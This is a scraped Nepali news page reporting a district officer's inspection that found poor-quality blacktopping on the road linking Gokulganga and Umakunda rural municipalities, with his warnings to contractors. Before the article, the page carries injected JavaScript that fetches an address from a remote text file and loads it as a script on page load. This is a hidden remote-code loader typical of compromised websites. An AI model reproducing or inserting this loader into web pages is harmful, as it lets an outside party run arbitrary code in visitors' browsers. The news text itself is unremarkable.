;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रजिअको छड्के अनुगम-गोकुलगंगा र उमाकुण्ड जोड्ने सडक कालो पत्रेको काम गुणस्तर हिन् – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • प्रजिअको छड्के अनुगम-गोकुलगंगा र उमाकुण्ड जोड्ने सडक कालो पत्रेको काम गुणस्तर हिन्
देश/प्रदेश

प्रजिअको छड्के अनुगम-गोकुलगंगा र उमाकुण्ड जोड्ने सडक कालो पत्रेको काम गुणस्तर हिन्

माघ ०६,

रामेछाप । रामेछाप जिल्लाका विभिन्न गाउँपालिका तथा नगरपालिका भित्र सडक कालोका कामहरु भैरहेका छन् । ती कालो पत्रेका कामहरु गुणस्तहिन हुदै आएका छन् । निर्माण पक्षले कमसल सामाग्रीको प्रयोग, जिम्मेवारीको उचित बहन नगर्ने कारणले कर्दा निर्माणाधिक संरचनाहरु कम्सल हुदै आएका छन् । यसै कुरालाई ध्यानमा राख्दै प्रमुख जिल्ला अधिकारी अर्जुन कुमार शर्माले जिल्लाका विभिन्न निर्माणाधिन सडक, कुलो, ढल, भवनलगाएतको अनुगमन तथा फिल्ड् सुपरिवेक्षणलाई बढाएको बताएका छन् । उनले मंगलबार जुनेली न्युजसंग कुरा गर्दै भने- म प्राविधिक त, है तर गोकुलगंगा गाउँपालिकादेखि उमाकुण्ड गाउँपालिका जोड्ने सडक कालोपत्रेको अनुगमन गर्दा, काममा गुणस्तर हिन पाईयो, त्यहाँ काम गरेको र हुदै छ, भन्ने देखाउनको लागि ठाउँ-ठाउँमा ढुङ्गा, गिट्टी,बालुवा थुपरेकोदेखियो तर काम गरिरहेको अवस्थादेखिएन, सडकको कुल नाम मात्रैको बनाएको पाईयो त्यसैले मैले यसको सम्बन्धित् पक्षलाई ध्यानकर्षण गराई सकेको छु भने ।

फोटो उमाकुण्ड-गोकुल गंगा गाउँपालिका जोड्ने सडक फाइल
फोटो उमाकुण्ड-गोकुल गंगा गाउँपालिका जोड्ने सडक फाइल

प्रजिअ शर्माका अनुसार नाला सानो, कालोपत्रे सुस्त, गुणस्तरहिण, कतै नालानै नबनाईएको, काम गर्ने बहानामा सडकको छेउमा ढुङ्गामाटो थुपरेर सवारी अवातजावताम समस्या पारेको, निर्माण गति सुस्तजस्ता समस्यादेखिएर सम्बन्धित गाउँपालिका तथा पूर्वधार निर्माण पक्षलाई ध्यानाकर्षण समेत गराईसकिएको छ ।

उमाकुण्ड गाउँपालिकाको कालचौतारदेखि गलामचौरताको सडक वाल, पर्खाल गुणस्तर हिन् पाईएको छ । त्यसको लागि पालिकालाई र निर्माण पक्षलाई खबरदारी गरिएको बताए । उनले केही दिन अघि उनले खाँडादेवी गाउँपालिकाको अन्तर्गतको सित्खा गोगन-पानी सडक कालोपत्रे गरेको भन्ने तर हातले उकाउदै सबै उकिने पाइएपछि अहिले सम्बन्धित निकायलाई काम गुणस्तर र सम्पन्न गरि सकिएको कामको प्राविधिकसहितक टोलीले त्यो काम गुणस्तर हो या हैन त्यसको प्रमाण दिन माग गरेको समेत जानकारी दिए ।

उनले काम सुस्त गतिमा गर्ने र गुणस्तर हिन काम गर्ने निर्माण पक्षको काम रोकिदिने चेतावनी दिए । उनले काम गुणस्तर गर्नु पर्ने बताए ।

फेसबुक प्रतिक्रियाहरु